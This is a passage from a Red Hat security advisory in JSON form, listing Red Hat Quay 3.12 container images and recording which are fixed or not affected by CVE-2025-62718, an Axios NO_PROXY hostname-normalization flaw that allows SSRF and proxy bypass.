                    "purl": "pkg:oci/quay-rhel8@sha256%3Af88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779811412"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64 as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x as a component of Red Hat Quay 3.12",
          "product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.12"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-62718",
      "cwe": {
        "id": "CWE-1289",
        "name": "Improper Validation of Unsafe Equivalence in Input"
      },
      "discovery_date": "2026-04-09T15:01:48.111177+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456913"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw has limited impact due to combination of non-default conditions to exploit: the attacker must be able to control or influence URLs passed to axios in a server-side context, the application must have both `HTTP_PROXY` and `NO_PROXY` configured, and the proxy itself must be positioned to act on the misdirected traffic or have been compromised by the attacker to intercept the rerouted traffic.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
